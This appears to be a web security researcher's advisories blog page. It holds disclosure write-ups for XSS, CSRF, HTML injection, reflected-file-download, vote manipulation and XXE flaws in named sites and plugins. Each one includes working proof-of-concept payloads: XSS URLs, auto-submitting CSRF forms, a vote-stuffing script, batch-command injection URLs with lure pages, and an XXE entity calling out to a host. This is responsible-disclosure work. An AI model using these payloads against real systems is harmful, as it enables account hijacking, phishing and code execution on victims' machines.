David Sopas – Web Security Researcher

Advisories

23/11/15 Advisories # , , ,

DepositFiles ZeroClipboard.swf XSS

DepositFiles ZeroClipboard.swf XSS

DepositFiles is a file storage website and one of the most popular ones. They’re online since 2005 and recently they start using dfiles.eu domain instead of the depositfiles.com. They allow free accounts but they also have membership fees.

When searching Google for a old depositfiles mirror I found a bogus ZeroClipboard version that reflected in a flash-based XSS.
This vulnerability in ZeroClipboard is well-known since 2012 – so pretty old issue laying around in this popular file storage site.

Proof-of-concept:

http://static.dfiles.eu/flash/ZeroClipboard.swf?id=\%22))}catch(e){}if(!self.a)self.a=!prompt(document.domain)//&width&height

With these attack, malicious users could hijack users accounts, phishing, malware redirections and a lot more.

I guess this file was lost in their static.dfiles.eu webserver. Sometimes these old vulnerable files can cause a breach on security. So if you are a security administrator or webdeveloper don’t forget to clean up any unused/outdated files.

Timeline:
09-11-2015 I sent the security report to DepositFiles
10-11-2015 DepositFiles replied that they forwarded the message to the manager
17-11-2015 I tested again my PoC and stop working because the file was removed. I requested an update from DepositFiles
23-11-2015 No reply was given but the vulnerable file was deleted so… full disclosure

 

no responses
20/11/15 Advisories # , , , ,

Bytes that Rock voting manipulation

Bytes that Rock voting manipulation

Rocky Bytes is a company well known for its informative reviews and news on all the latest games and programs. Each year they promote Bytes That Rock – an event committed to bring worldwide recognition the software and blogs that have achieved excellence in the market with their hard work, effort, dedication.

After reading the post from Graham Cluley  which I follow on my daily feed, I decided to check Bytes That Rock best security blog nominees.

I noticed Brian Krebs – krebsonsecurity.com there and I’m a big fan of his work. I voted for him and noticed that the voting form had not protection – besides IP verification.

As a curious individual as I am I tried to check the form security a little further…

I thought to myself – What if I can make Krebs win the competition? 🙂

Since the voting form lacked any security token or CAPTCHA [or even a confirmation email link] I created a small proof-of-concept:

Let me explain with a proof-of-concept:

<?php
$email_generator = rand(10000, 9999999) . "@gmail.com";
?>
<form method="post" action="http://www.rockybytes.com/bytes-that-rock/krebs-on-security" name="dsopas">
<input type="hidden" name="email" value="<?php echo $email_generator; ?>" />
<input type="hidden" name="nombre" value="David" />
<input type="hidden" name="programa" value="136" />
<input type="hidden" name="legal" value="on" />
<input type="hidden" value="votar" name="accion"/>
</form><script> document.dsopas.submit(); </script>

I used 2 proxies to open the specially crafted page and both voted successfuly for Krebs blog. So I only needed a unique IP and a auto generated email to vote.
But I don’t needed a unique IP.

Imagine the following scenario:

On a popular blog or network I post a link that contains a hidden IFRAME to my proof-of-concept. Each time a user visits the page, it gives a vote to Krebs.

I contacted Rocky Bytes I told them about this security issue. They took less than 24 hours to implement a CAPTCHA system and told me that in the next edition they will improve their security system using my suggestions.

vote_captcha

They also informed me that – I quote:

You should also know that if let the users be the only ones who decide, it won’t be the best one on each category winning but the one with biggest amount of fans, and that wouldn’t make it fair for those small ones who put a huge effort and create quality software and blogs, jeopardizing the whole purpose and philosophy behind this event This is the reason why we put together a Jury of experts on the field and gave them a 70% of the weight on the decision, whilst only the remaining 30% goes for the votes from the public.

As a side note I informed them that during my testing I voted for Brian Krebs blog 3 times. One was valid with my own IP and the other two were made with 2 proxies and auto-generated emails with the name David.

I decided to make this public because it’s important for other voting system to take their security into account. Sometimes the winner is manipulated by users that can bypass the system.

I’m glad I’ve helped Bytes that Rock!

no responses
06/11/15 Advisories # , ,

Edmodo XSS and HTML Injection

Edmodo XSS and HTML Injection

For those who don’t know Edmodo

The safest and easiest way for educators to connect and collaborate with students, parents, and each other.

They count with 59,411,899 members. Huge number.

I decided to help them providing them with two security issues. A Reflected XSS and a HTML Injection.

#1 Reflected XSS

After registering in Edmodo I noticed a request to ZeroClipboard.swf on my Google Inspector.
I know that older versions of this SWF have a XSS vulnerability so I gave it a try:

https://www.edmodo.com/bin/ZeroClipboard.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Guess what? It was vulnerable version. It worked perfecly and my cookie was shown in a Javascript alert box.

zero_xss

#2 HTML Injection on Create Invites

This was interesting and I already found similar issues on many websites.
Using the invitee_first_name field you could inject HTML to trick the victim [invitee_email].

Take for example this proof-of-concept:

Ze<br /><a href="http://www.davidsopas.com/poc/malware.htm" style="font-size:14px;text-decoration:none;margin:0 auto;background:#69a229;color:white;font-weight:400;border:1px solid #457a04;border-radius:4px;display:inline-block" target="_blank"><span style="display:inline-block;padding:10px 34px">Accept Invitation and Win a Bonus</span></a>

When sending a reminder you could also use the same technique:

<br /><a href="http://www.davidsopas.com/poc/malware.htm" style="font-size:14px;text-decoration:none;margin:0 auto;background:#69a229;color:white;font-weight:400;border:1px solid #457a04;border-radius:4px;display:inline-block" target="_blank"><span style="display:inline-block;padding:10px 34px">Accept Invitation and Win a Bonus</span></a>

This would reflect on the victims email. I used the same style of a existing Edmodo button. When the victim clicked, it goes to my proof-of-concept page.

Possible attack scenario:

  1. Malicious user sends invitations with a HTML injection [like my proof-of-concept]
  2. Victim thinks that’s a button from Edmodo and clicks on it.
  3. Victims browser gets hijacked

Edmodo guys were awesome, giving constantly updates on the report status. Also they sent me some goodies but European customs retain the package 🙂

Timeline:
13-10-2015 I sent a email request security contact
13-10-2015 Edmodo replied to the above question
13-10-2015 I sent the security report
22-10-2015 Edmodo replied that both issues were validated and they’re working on it
04-11-2015 Edmodo fixed both issues
06-11-2015 Full disclosure

6 responses
28/10/15 Advisories , Swag # , ,

SendGrid Reflected File Download

SendGrid Reflected File Download

For those who don’t know who SendGrid is…

SendGrid provides unmatched deliverability, scalability, and reliability. We deliver email on behalf of happy customers such as: Airbnb, Foursquare, Spotify and Uber.

They send over 19 billion emails per month.

When visiting their site I noticed a XHR request on my Google Inspector that caught my attention:

https://sendgrid.com/user/checkLogin?callback=mycallback&callback=jQuery171016384647646918893_1439389801565
&_=1439389801826

Which returned the following JSON information:

/**/jQuery171016384647646918893_1439389801565({“status”:”success”,”logged_in”
:false});

I noticed that the callback was called on the URL so I decided to inject my RFD vector:

https://sendgrid.com/user/checkLogin?callback=mycallback&callback=||start chrome websegura.net/malware.htm||

Reflecting:

/**/||start chrome websegura.net/malware.htm||({“status”:”success”,”logged_in”:false});

Now that I could reflect my payload and removed the variables that don’t do anything on my proof-of-concept and try to manipulate the filename without giving a HTTP error:

https://sendgrid.com/user/checkLogin/freecoupons.bat?&callback=||start chrome websegura.net/malware.htm||

For Internet Explorer 8 and 9 you didn’t need anything else.
If you run this last URL it would automatically try to download freecoupons.bat file from sendgrid.com servers.

ie_sendgrid_rfd

On other modern browsers you needed the HTML5 download attribute.
The download would start just by clicking the image.

chrome_sendgrid_rfd

A malicious user could:

  1. Launch a malicious campaign with the specially crafted page providing SendGrid.com coupon codes
  2. Victim downloads the file thinking that is from a trusted domain [SendGrid.com]
  3. Malicious user gains control over victims machine

SendGrid were always on top of the issue [cool guys] and they were nice enough to send me a awesome t-shirt 🙂

Timeline:
12-08-2015 Reported this security issue to SendGrid
20-08-2015 SendGrid replied that was fixing the issue
29-09-2015 Asked for a update
27-10-2015 SendGrid reported that the issue is fixed

no responses
15/10/15 Advisories # , , , , ,

Events Made Easy WordPress plugin CSRF + Persistent XSS

Events Made Easy WordPress plugin CSRF + Persistent XSS

Plugin link: https://wordpress.org/plugins/events-made-easy/
Active Installs: 10,000+
Version tested: 1.5.49
CVE Reference: Waiting

Events Made Easy is a full-featured event management solution for WordPress. Events Made Easy supports public, private, draft and recurring events, locations management, RSVP (+ optional approval), Paypal, 2Checkout, FirstData and Google maps. With Events Made Easy you can plan and publish your event, or let people reserve spaces for your weekly meetings. You can add events list, calendars and description to your blog using multiple sidebar widgets or shortcodes; if you are a web designer you can simply employ the template tags provided by Events Made Easy.

When playing around with this plugin I noticed a couple of vulnerabilities. In my opinion they are critical because they can could cause damage to a WordPress installation.
All of them are related to CSRF where the vendor forgot to place a security token (wp_nonce) on the affected forms.

#1 Add template CSRF + Persistent XSS

URL: /wp-admin/admin.php?page=eme-templates

If a authenticated admin clicks on the “Add template” button on a html with this code:

<form action="https://victims_website/wp-admin/admin.php?page=eme-templates" method="POST">
<input type="hidden" name="eme_admin_action" value="do_addtemplate" />
<input type="hidden" name="description" value="<svg/onload=confirm(1)>" />
<input type="hidden" name="format" value="csrf" />
<input type="submit" name="submit" value="Add template" />
</form>

It will add a Persistent XSS vector on the template description field. This field is automatically executed when the admin visits the page admin.php?page=eme-templates.

Possible attack scenario:

  1. Malicious user checks that Events Made Easy is installed on a WordPress installation
  2. Malicious sends admin a link to the page that has a auto-submit form with a XSS vector that hijacks victims browser
  3. Victim visits the page and gets hijacked

#2 Add Form Field CSRF + Persistent XSS

URL: /wp-admin/admin.php?page=eme-formfields

If a authenticated admin clicks on the “Add field” button on a html with this code:

<form action="https://victims_website/wp-admin/admin.php?page=eme-formfields" method="POST">
<input type="hidden" name="eme_admin_action" value="do_addformfield" />
<input type="hidden" name="field_name" value="<svg/onload=confirm(1)>" />
<input type="hidden" name="field_type" value="1" />
<input type="hidden" name="field_info" value="csrf" />
<input type="hidden" name="field_tags" value="csrf" />
<input type="submit" name="submit" value="Add field" />
</form>

Like vulnerability #1 the attack scenario is the same. Same issue affects form fields on this plugin.

#3 Remove events older than CSRF

URL: /wp-admin/admin.php?page=eme-cleanup

With this CSRF a malicious user could delete all the events older than a certain number.
In my proof of concept I used a auto-submit form that could also be used in vulnerabilities #1 and #2.

<form action="https://victims_website/wp-admin/admin.php?page=eme-cleanup" name="dsopas" method="POST">
<input type="hidden" name="page" value="eme-cleanup" />
<input type="hidden" name="eme_admin_action" value="eme_cleanup" />
<input type="hidden" name="eme_number" value="1" />
<input type="hidden" name="eme_period" value="day" />
<input type="hidden" name="doaction" value="Apply" />
</form> <script> document.dsopas.submit(); </script> 

Possible attack scenario:

  1. Malicious user checks that Events Made Easy is installed on a WordPress installation
  2. Malicious sends admin a link to the page that has this auto-submit form
  3. Without victim noticing, events older than 1 day will be removed.

Solution:
Vendor in a matter of few hours launched a patched version – 1.5.50. Also he was kind enough to put my name on the changelog.

one response
30/09/15 Advisories # , , , , , ,

Komento Joomla! component Persistent XSS

Komento Joomla! component Persistent XSS

CVE Reference: CVE-2015-7324

Komento is a Joomla! comment extension for articles and blogs in K2, EasyBlog, ZOO, Flexicontent, VirtueMart and redShop.

@http://stackideas.com/komento

I found out that was possible to launch a Persistent XSS attack when adding a new comment using the WYSIWYG website and image buttons.
This issue was critical in both environments – frontend and backoffice.

In frontend when a user visited a page where the comment has a XSS attack it would be automatically affected.
In the other side – the backoffice – when the admin checked the new comment it would be vulnerable to this attack and could get his account hijacked or something even more dangerous.

What I did was to pass along the XSS vector in the [img] code and use the Javascript onload to run the exploit when image loads.

Proof-of-concept using [img]:

[img]http://www.robolaranja.com.br/wp-content/uploads/2014/10/Primeira-imagem-do-filme-de-Angry-Birds-%C3%A9-revelada-2.jpg” onload=”prompt(1)[/img]

Proof-of-concept using [url]:

[url=”https://www.davidsopas.com” onmouseover=”prompt(1)”]Your text to link[/url]

komento_onmouseover

In the [img] case this will reflect the following HTML (on the frontend):

<img src="http://www.robolaranja.com.br/wp-content/uploads/2014/10/Primeira-imagem-do-filme-de-Angry-Birds-%C3%A9-revelada-2.jpg" data-pagespeed-onload="prompt(1)" alt="http://www.robolaranja.com.br/wp-content/uploads/2014/10/Primeira-imagem-do-filme-de-Angry-Birds-%C3%A9-revelada-2.jpg" onload="prompt(1)" style="max-width:300px;max-height:300px;" onload="var elem=this;if (this==window) elem=document.body;elem.setAttribute('data-pagespeed-loaded', 1)"/>

komento_frontend

And…

<img src="http://www.robolaranja.com.br/wp-content/uploads/2014/10/Primeira-imagem-do-filme-de-Angry-Birds-%C3%A9-revelada-2.jpg" data-pagespeed-onload="prompt(1)" alt="http://www.robolaranja.com.br/wp-content/uploads/2014/10/Primeira-imagem-do-filme-de-Angry-Birds-%C3%A9-revelada-2.jpg" onload="prompt(1)" style="max-width:300px;max-height:300px;">

In the administrator area.

This Joomla! component has lot’s of Google results and can affect a large number of innocent people. A victim just by visiting the page with a malicious comment will be affected.

All versions prior to 2.0.5 are affected.
Vendor already patched both security issues in the new version 2.0.5 – http://stackideas.com/changelog/komento

no responses
29/09/15 Advisories # , , ,

Shopify open to a RFD attack

Shopify open to a RFD attack

Before Shopify having a bounty program on HackerOne I already sent [on 19 march] a security report about a Reflected Filename Download I found on their website.
It doesn’t need any authentication like access_token, api_key or even an account on Shopify.

The problem is located under app.shopify.com service.

On Internet Explorer 9 and 8 browsers if you run the following link:

https://app.shopify.com/services/signup/track.bat?callback=foobar&signup_page=http%3A%2F%2Fwww.shopify.com%2F%22||start%20chrome%20davidsopas.com/poc/malware.htm||&_=

It will show download dialog with a file named track.bat that after execution it will run Google Chrome with a malicious webpage (in this case it’s only text).
Of course a malicious user could run any operating system command he wishes.

On other browsers like Chrome, Opera, Firefox, Android Browser and Chrome for Android latest versions you need to visit a page which will force the download using HTML5 <A DOWNLOAD> attribute:

<div align="center"> 
<a href="https://app.shopify.com/services/signup/track.bat?callback=foobar&signup_page=http%3A%2F%2Fwww.shopify.com%2F%22||start%20chrome%20davidsopas.com/poc/malware.htm||&_=" download="track.bat">
<img src="http://harleyf.com/wp-content/uploads/2010/03/94_shopify.png" border="0" />
</a> <
h1>Shopify is giving away premium service!</h1> 
<p><i>(Firefox users: Use "Save link as" to download the file)</i></p> 
</div>

When the victim visits a specially crafted page with the code above and click the image it will show the download dialog and after downloading it will show that the file is coming from Shopify servers.

shopify_chrome_rfd

shopify_opera_rfd

So a possible attack scenario will be:

  1. Malicious user sends link to victim like it would with a CSRF or a XSS (phishing campaigns, social networks, instant messengers, posts, etc)
  2. Victim clicks the link and trusting where it came from (Shopify) he downloads it
  3. Victim runs the file and his computer it’s hijacked

To the victim, the entire process looks like a file is offered for download from Shopify original site and it would not raise any suspicious. A malicious user could gain complete control over a victims computer system and launch malicious files that appear to originate from a trusted party.

In my opinion this was the last time I’ll send anything to Shopify. We have different views on patching security reports.
An example: Some of the bounties that they already paid on HackerOne are Self-XSS and Missing SPF. Both issues were awarded with the minimum amount – $500. I don’t know where or why these issues are more dangerous than my security report but it’s up to them.
I was patient and gave them enough time to fix this issue – even sending them possible solutions. More than 6 months on a paid online store service and still unfixed seems to much.

So beware of this issue because according to Shopify they don’t foresee that this issue will be fixed any time soon.

Timeline:
19-03-2015 Reported this security issue to Shopify
27-03-2015 No reply so I asked for a update
06-04-2015 First contact with Shopify which they reply that it’s being processed
15-04-2015 Shopify told me that this security issue is interesting and ask for more information
15-04-2015 I sent more information and new proof-of-concept
04-05-2015 I asked for a update (no reply)
15-06-2015 I asked for another update (no reply)
16-09-2015 I asked for another update
22-09-2015 Since April without any email from Shopify they replied that they were working on fixing more urgent issues and consider mine a low impact and low priority
23-09-2015 I told them that it’s not a social engineering issue but they still don’t understand it
23-09-2015 Shopify told me that their prioritization is not up for discussion and not patching any time soon.
25-09-2015 Full disclosure

3 responses
23/09/15 Advisories # , , ,

Acunetix got RFDed!

Acunetix got RFDed!

After publishing a report on a security software – OWASP ZAP – I found another vulnerability on a security company – Acunetix.
Reminds the proverbial saying:

Shoemaker’s son always goes barefoot.

I found a way to trick users into downloading a batch [executable] file that comes from ovs.acunetix.com using a Reflected Filename Download vulnerability.
It was funny how I found this one. I noticed that Acunetix allowed to test vulnerabilities online and I was curious about that web appplication. I register for a demo account and noticed lot’s of XHR requests on my Google Inspector. So I decided to give RFD a try…

This security issue affected almost all XHR requests on ovs.acunetix.comAcunetix Online Vulnerability Scanner. Every request allowed a user to inject a callback with special characters that would allowed me to launch a possible attack.

Take this example:

https://ovs.acunetix.com/rpc/reports/count?sgn=1&callback=start chrome davidsopas.com/poc/malware.htm||

Which reflects on the screen:

start chrome davidsopas.com/poc/malware.htm||({“message”: “get:sgn:invalid size”, “data”: null, “error”: “bad-input”});

It didn’t give any HTTP error:

Request URL:https://ovs.acunetix.com/rpc/reports/count?sgn=1&callback=start%20chrome%20davidsopas.com/poc/malware.htm||
Request Method:GET
Status Code:200 OK
Remote Address:54.209.55.15:443

So I was able to inject a callback that even giving an error on the JSON information it didn’t return a HTTP error.

Because I couldn’t control the filename and force a download I needed to use the HTML5 download attribute.

<div align="center"> 
 <a href="https://ovs.acunetix.com/rpc/reports/count?sgn=1&callback=start chrome davidsopas.com/poc/malware.htm||" download="setup.bat" onclick="return false;">
 <img src="https://www.davidsopas.com/poc/Acunetix_1.jpg" border="0" />
 </a> 
 <h1>Download Acunetix Web Security Scanner for Free!</h1> 
 <p><i>(Use "Save link as" to download the file)</i></p> 
</div>

As I said before it happened in almost every XHR requests:

https://ovs.acunetix.com/rpc/scans/count?sgn=1&callback=start%20chrome%20davidsopas.com/poc/malware.htm||
https://ovs.acunetix.com/rpc/scans/list?sgn=1&callback=start%20chrome%20davidsopas.com/poc/malware.htm||
https://ovs.acunetix.com/rpc/licenses/get?sgn=1&callback=start%20chrome%20davidsopas.com/poc/malware.htm||

Possible attack scenario:
Because this file can be accessed without authentication a malicious user could use this to attack any user.

  1. Malicious user creates a specially crafted page – similar to my proof-of-concept – promising to download Acunetix web security software.
  2. Victims clicks to download the file [even if the victim checks the source-code of the page they would see the trusted source – acunetix.com]
  3. Victims runs the file and gets hijacked

Acunetix security team fixed this vulnerability very fast proving that they’re on top of things. I wish I could to see other companies follow Acunetix patching timeline.

Timeline:

17-09-2015 Reported to Acunetix
17-09-2015 Acunetix acknowledged the vulnerability
18-09-2015 Acunetix informed me that they fix this security issue
22-09-2015 Full disclosure

one response
22/09/15 Advisories # , , , ,

OWASP ZAP XXE vulnerability

OWASP ZAP XXE vulnerability

I just noticed that this is my first full disclosure of a XXE vulnerability. I already found others but they were inside private bounty programs.

For those who don’t know OWASP ZAP:

The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications.
It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing.
ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.

@ https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project

When checking some files from the application I noticed that there are a lot of XML files so I decided to “play” the XXE (XML External Entity) card to check if it OWASP ZAP was vulnerable. I know that finding this type of local vulnerability is a low level issue specially because you need to have access to the local files of the victim but what if the malicious user wants to backdoor the operating system without the trouble of being detected? Cool idea right?

What I done:

  • Opened config.xml on OWASP ZAP local path
  • Added after the <xml> tag the following code:
<!DOCTYPE foo [ 
 <!ELEMENT foo ANY >
 <!ENTITY xxe SYSTEM "http://davidsopas.com/XXE" >]><foo>&xxe;</foo>
  • Saved it and run OWASP ZAP
  • Checking the logs of davidsopas.com I had:

xx.xx.xxx.xxx – – [14/Aug/2015:16:29:05 +0100] “GET /XXE HTTP/1.1” 301 234 “-” “Java/1.8.0_31”

Keep in mind that config.xml is updated when you run the application so the XXE attack is removed automatically cleaning the tracks of a possible malicious user.
Others XML files could also be vulnerable.

I reported this issue to OWASP ZAP guys and they agree with me that it’s not a critical security issue but they fixed it on the version 2.4.2 – https://github.com/zaproxy/zaproxy/issues/1804 – by disabling processing of XML external entities by default.

They were also nice enough to put my name in their acknowledgement list.
If you don’t use OWASP ZAP give it a try. I use it almost everyday. It’s a excellent pentesting tool and with great online support.

one response
18/09/15 Advisories # , ,

Linkedin Reflected Filename Download

Linkedin Reflected Filename Download

When researching another website I discovered a XHR request on my Google Inspector on Linkedin that seemed interesting:

https://www.linkedin.com/countserv/count/share?url=http://www.site_i_was_in.pt

Basically it was the request made by websites to count how many shares their site have on Linkedin network.
As a curious security researcher I tried to modify the url parameter to something more interesting:

https://www.linkedin.com/countserv/count/share?url=”||calc||

Which returned:

IN.Tags.Share.handleCount({“count”:0,”fCnt”:”0″,”fCntPlusOne”:”1″,”url”:”\”||calc||”});

Url parameter wasn’t validated and it was reflected on the JSON file.
If I downloaded the file and renamed it to .bat it executed the calculator from Windows.
But this is not enough I needed to change the path so it downloads a batch file and use a different windows command.

https://www.linkedin.com/countserv/count/share;setup.bat?url=”||start chrome websegura.net/malware.htm||

Guess what? IE8 downloaded automatically this batch file from a trusted domain – linkedin.com
I wanted to work with other browsers so I needed HTML5 download attribute.

<div align="center"> 
<a href='https://www.linkedin.com/countserv/count/share;setup.bat?url="||start chrome websegura.net/malware.htm||' download="setup.bat" onclick="return false;">
<img src="http://damnlink.com/uploaded_images/godaddy_coupons_and_godaddy_promo_code_3187745288.png" border="0" /></a> 
<h1>Linkedin Premium account!</h1> 
<p><i>(Use "Save link as" to download the file)</i></p> 
</div>

linkedin_rfd_chrome

So a possible attack scenario would be:

  1. 1. Malicious user sends link to victim like it would with a CSRF or a XSS (phishing campaigns, social networks, instant messengers, posts, etc)
  2. Victim clicks the link and trusting where it came from (Linkedin) he downloads it
  3. Victim runs the file and his computer it’s hijacked

A malicious user could even give more credibility to the HTML5 download site if he uses famous open redirections vulnerabilities on trusted sites like open redirects on Google or even on Linkedin.

To the victim, the entire process looked like a file is offered for download from Linkedin original site and it would not raise any suspicious. A malicious user could gain complete control over a victims computer system and launch malicious files that appear to originate from a trusted party.

Malicious users are always searching for better ways of gaining trust of victims. This could be the right online weapon.

Timeline:
11-05-2015 Sent the report to Linkedin
11-05-2015 Didn’t understand the true nature of the attack
11-05-2015 I replied with more information using other public RFD attacks and Oren Hafif paper about RFD
13-05-2015 Linkedin told me that they’re working in a solution
02-06-2015 I asked for an update
03-06-2015 Linkedin replied that they will give me an update soon
01-07-2015 I asked again for an update
09-09-2015 Linkedin replied that they had fix the issue
18-09-2015 Full disclosure

3 responses